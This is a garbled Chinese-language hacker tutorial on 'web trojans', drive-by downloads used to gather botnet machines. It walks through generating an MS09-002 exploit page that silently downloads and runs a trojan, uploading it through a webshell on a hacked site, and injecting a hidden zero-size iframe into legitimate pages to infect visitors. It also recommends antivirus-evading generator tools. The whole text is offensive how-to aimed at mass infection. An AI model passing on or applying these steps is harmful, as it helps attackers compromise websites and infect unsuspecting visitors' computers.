網馬技術揭祕

網馬技術揭祕

首先說什麼是網馬，網馬有什麼用呢？例如，你們想玩鴿子，想找肉雞。想找不少不少的肉雞。固然方法不少，例如135抓雞什麼的。可是我想你們都遇到一個問題，看人家教程上，抓雞一會兒就來了一串一串的。我本身操做爲啥老半天就掃不到呢？由於這漏洞出來好久了，再者，每天有人掃肉雞。固然肉雞就少了，也很難找到。還有，你們掃描肉雞的方法可能也有點不對。綜合起來，利用這些漏洞找肉雞的效率很低下。那麼用網馬呢，網馬就是掛馬。你想下。要是一個網站，一天有1萬我的訪問，一萬我的中哪怕概率下降到%1的中馬率。一天也有100我的中馬成爲你的肉雞啊。並且，你掛上網馬後關機睡覺肉雞也刷刷刷的上來。因此網馬很爽，因此也比本身拿個軟件掃描漏洞來勁。

上面說了網馬的做用。綜合敘述下，就是快捷，方便。更快，更高，更強的達到散播***的途徑。而後，你們應該明什麼是網馬了吧？對的，網馬簡單的說下，就是網頁***。當別人訪問一個網頁就可能從這個網頁自動下載***，而且在你後臺悄悄運行。這就是網馬。簡單的這麼理解，固然咱們學***知識的確定對這些東西不能簡單理解了事了。可是，咱們只是入門的小菜鳥，因此再深刻了解一點點就好了。

深刻說下。什麼是網馬？網馬就是利用網頁代碼操做win的漏洞。首先，咱們得明白什麼是網頁。爲何咱們打開一個網站，這個網站會顯示出這些圖片。就如你如今看的這篇帖子，爲何背景是這個顏色，爲何字體有大有小，爲何網頁各處的顏色不一樣。而後構成了這樣一個網頁。怎麼構成的？難道就是簡簡單單的幾張圖片就構成了咱們如今看到的這個網頁頁面？錯了。是圖片+文字+代碼。這是一個網頁構成的基本元素。可是，代碼是必需要的。這裏提到了代碼。例如一段網頁由設計者設計，圖片應該放這裏，文字應該按照這樣排列。這些設計，規劃，就是代碼來操做的。當設計者把網頁代碼編寫好了。而後放在服務器上(通常來講是IIS服務器.IIS簡單的說下,就是網頁服務器.)進行服務器的解析。而後當你訪問這個網站。那麼就獲得了你如今所看到的網頁了。這裏提到了代碼。是的。不光服務器要分析代碼。你的電腦也要解析分析代碼。你的電腦分析了代碼才能顯示出這樣的頁面。因此你們能夠在網頁空白處，右鍵單擊 查看源文件 就會看到代碼了。固然，這個只是你單方面的代碼，核心代碼仍是在服務器上。你這樣看到的只是顯示的頁面解析的靜態的頁面代碼。也就是說是HTM的代碼。因此，你在瀏覽器上點，文件---另存爲 保存網頁的時候都是HTM格式！

上面說到了代碼。下面說下漏洞。WIN這個操做系統有不少漏洞。我相信你們都知道，清楚。例如：MS06-04O這樣的ms開頭的漏洞名字。這些漏洞是怎麼造成的呢。就是代碼操做造成的。有些朋友就問了，代碼怎麼會出現漏洞呢。一時半會講不清楚。舉例吧，簡單通俗的例子。例如x=取文本 y=取X前三個數字 這麼一段代碼。若是實際操做的時候，這個文本若是取出來時1234567 那麼X就等於1234567 那麼Y取的是X文本前三個數字那麼Y就等於123.這麼一段代碼看是沒問題。可是若是取不到文本呢.或者取到的文本數字就1個呢？好比X=1 就一個數字。那麼Y怎麼取出前三個數字呢？遇到特殊狀況，那麼就有可能形成代碼出錯。固然，我這裏是舉例，爲了你們簡單，就用最最最通俗的例子給你們舉例。具體代碼不可能這麼亂七八糟的。若是咱們這段代碼加個判斷。若是X取到的數字小於3.那麼Y就不取前三個數字，或者Y就等於0。那麼是否是什麼事情都沒了呢？可是，程序員一不當心，沒注意，或者沒看到這個代碼的弊端。那麼就有可能形成代碼出錯。形成了漏洞。以小畫大，那麼WIN的操做漏洞大多數也是相似的。因爲程序代碼的問題。被***發現了。那麼就利用這段代碼的漏洞，構形成別有用心的代碼形成對電腦的破壞。固然，不侷限於WIN系統。也能夠是例如迅雷，暴風影音照樣的第三方軟件！

口水不少。也不知道你們聽懂了沒有。咱們來結合下。上面說到了訪問網頁其實就是根據網頁，而後本地執行代碼。而後顯示在咱們的電腦網頁上面。WIN的漏洞就是代碼漏洞。***編造一段利用這個代碼的漏洞能夠進行***。聰明的朋友應該想到了。訪問網頁要執行一些代碼，win的漏洞要被利用須要執行一些特殊代碼！因此。網馬就是構造一段特殊的代碼，當你電腦訪問了執行了這段代碼，正好你的電腦上有被這段代碼利用的漏洞。那麼！恭喜你，你就中網馬了。

網馬就是這樣造成的。因此，有些***很牛B的說。我就算是把個人管理員帳號密碼告訴你。你也***不了個人電腦。就如，你把你的網馬發給我。我訪問了。我照樣沒事。爲啥，我電腦沒漏洞，你怎麼利用！呵呵，我想你們能理解了吧。

固然，咱們小菜鳥深刻到這步瞭解就差很少了。如何找漏洞。如何找到漏洞構造此漏洞的代碼編寫。這就是***們的事情了。咱們還沒這個能力。下面說下網馬製做。上文提到了，網馬就是一段網頁代碼。固然，咱們不懂這些代碼如何編寫。咱們仍是用別人的工具吧。網上也有不少網馬生成工具。我隨便找了一款。你們也能夠自行去網上搜索尋找。

首先，咱們打開軟件,咱們能夠看到。上面有不少ms這樣開頭選項。這就是WIN的系統漏洞利用。固然咱們看到了有暴風，聯衆，等這樣的。這就是第三方軟件漏洞的利用了。這裏，注意上面有個下載地址。什麼是下載地址呢。就是咱們***的下載地址。咱們把***上傳到網站上。而後獲取到***的下載地址。固然了。別人直接訪問你的這個下載地址。系統會提示你是否下載的提示不說，別人不運行。***就運行不了。因此這裏要結合上網頁代碼。構形成一個網馬。我本地作實驗。就不上傳***了。假如，它上面填寫的就是個人***下載地址吧。我點ms9002。看到了嗎？都是代碼。網頁代碼！092.htm的代碼意思是運行同目錄下的ms09002.js。ms09002.js的大概意思是。利用ms09002的漏洞，自動下載咱們上面指定的那個網址的***後，自動運行。固然ms09002的代碼是加密了的。咱們也看不大實在！

那麼這兩個文件就是咱們的網馬文件了。咱們只須要把這兩個文件上傳到咱們網站上。別人訪問了這個網頁，若是有ms09002這個漏洞，就可能中馬！咱們來上傳吧。我用個人一個webshell給你們演示下吧。網馬我就上傳到個人webshell目錄下！網馬生成器，生成了兩個文件，就上傳兩個。生成了一個，就上傳一個。

那麼咱們的網馬地址在哪兒呢？咱們的上傳地址是：C:\inetpub\wwwroot\EasySite\Portals\95\cpzs\ 這個目錄下。那麼咱們要訪問的目錄地址就是EasySite\Portals\95\cpzs\ +網馬名字  咱們網馬是由092.htm調用運行同目錄下的ms09002.js那麼網馬名字就是092.htm。那麼訪問地址就是http://www.******.com/EasySite/Portals/95/cpzs/092.htm到此。咱們的網馬就作好了。咱們的ms09002漏洞網馬地址就是http://www.******.com/EasySite/Portals/95/cpzs/092.htm 發給有此漏洞的朋友。若是他們電腦沒網馬攔截軟件，或者沒其餘防護手段。那麼極有可能中馬！
這裏又說下。構成網馬的代碼不少種。固然，網上免費的，分兩種。一種是***炫耀技術，故意放出來的。第二種，商業***，寫的免費的給你們試用。對於這樣公佈了的網馬生成器。有幾個壞處。第一，中馬效率低下。意思是說，有可能別人訪問了你的網站根本不會中馬。第二，容易被殺毒軟件攔截。這個你們都清楚吧！第三，容易當別人的工具。可能免費的。裏面的代碼加入了工具製做者的網馬。你掛上了網馬，別人種了你的網馬，也可能中了此工具製做者的網馬！這就是致使不少朋友作的網馬失效的緣由！因此，對於網馬生成器。你們能夠耐心的去網上找找。確定會找到一箇中馬率高，免殺的免費的。只不過須要花費大量的時間和精力去搜索而後測試。固然，有經濟的朋友能夠購買商業***的網馬生成器。通常來講很不錯的。若是購買請注意網絡騙子！

上面幾大段談了什麼是網馬用途，什麼是網馬，如何製做網馬。下面我說說怎麼掛馬吧！
掛馬什麼意思？出現這個概念的時候是基於網馬之上的。我網馬作出來了。不可能每一個羣，每一個人去宣傳個人網馬地址吧。如今的人也聰明。通常的網址不點的。因此這裏要用到掛馬了。把這個網址附加到正常的網頁上。當網友訪問了正常的網頁，也就不知不覺的中了你的網馬了。

用到的代碼：<iframe src="你的網馬地址" name="lcx" width="0" height="0" frameborder="0"></iframe>這句代碼通常加在網頁的末尾。例如我***了一個網站。我要在他的網站上掛馬。例如在http://****/EasySite/Portals/95/cpzs/p_w_picpath.asp這個頁面上掛馬。那麼，咱們進入webshell找到p_w_picpath.asp這個頁面。把：<iframe src="你的網馬地址" name="lcx" width="0" height="0" frameborder="0"></iframe>這代碼加入進去。上面網馬作好了。那麼就加入：<iframe src="http://www.******.com/EasySite/Portals/95/cpzs/092.htm" name="lcx" width="0" height="0" frameborder="0"></iframe>保存後。那麼咱們掛馬就成功了。那麼別人一訪問http://****/EasySite/Portals/95/cpzs/p_w_picpath.asp這個正常頁面。那麼就會不知不覺也訪問了你的網馬網頁，就會中了你的網馬了。

固然，若是你要掛在首頁就在首頁的文件裏面加入代碼。你若是要在整個網站的每一個頁面都掛馬。那麼每一個頁面均可以加入此代碼。這就是掛馬。

中安致遠  IT教育培訓機構 www.sans.org.cn